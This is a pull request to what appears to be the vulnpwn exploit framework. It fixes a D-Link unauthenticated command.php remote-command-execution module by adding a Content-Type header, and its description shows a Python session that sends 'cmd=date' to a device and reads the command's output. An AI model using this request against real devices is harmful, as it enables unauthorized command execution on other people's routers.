### PR TITLE
fix requests bug - requests.exceptions.ConnectionError

### DIFF
--- a/modules/exploits/linux/http/dlink_command_php_unauth_rce.py
+++ b/modules/exploits/linux/http/dlink_command_php_unauth_rce.py
@@ -38,14 +38,15 @@ class Module(exploit.Exploit):
                                   self.options['TARGETURI']['value'])
 
         self.output('Exploiting - %s' % uri)
-        headers = {'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/24.0'}
+        headers = {'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/24.0',
+                   'Content-Type': 'application/x-www-form-urlencoded'}
         sess = requests.Session()
         resp = sess.post(uri, headers=headers,
                          data=self.generate_rce_payload(cmd))
         if resp and resp.status_code == 200 and resp.text:
             date = resp.text.strip()
             if len(date) == 8 and date.isdigit():
-                self.output('[+] Target is vulnable')
+                self.output('Target is vulnable')
 
     def main(self, *args, **kwargs):
         self.check()


### PR DESCRIPTION
fix https://github.com/open-security/vulnpwn/issues/4

```
~  python -V
Python 2.7.10
~ python
Python 2.7.10 (default, Oct 23 2015, 19:19:21)
[GCC 4.2.1 Compatible Apple LLVM 7.0.0 (clang-700.0.59.5)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests;
>>> resp = requests.Session().post('http://192.168.128.159:80/command.php', data='cmd=date +%Y%m%d')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/sessions.py", line 518, in post
    return self.request('POST', url, data=data, json=json, **kwargs)
  File "/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/sessions.py", line 475, in request
    resp = self.send(prep, **send_kwargs)
  File "/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/sessions.py", line 585, in send
    r = adapter.send(request, **kwargs)
  File "/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/adapters.py", line 453, in send
    raise ConnectionError(err, request=request)
requests.exceptions.ConnectionError: ('Connection aborted.', BadStatusLine("''",))
```

If **`Content-Type`** is set, everything goes well.

```
>>> resp = requests.Session().post('http://192.168.128.159:80/command.php', data='cmd=date +%Y%m%d', headers={'Content-Type': 'application/x-www-form-urlencoded'})
>>> resp.text
u'\r\n\r\n20000101\n'
```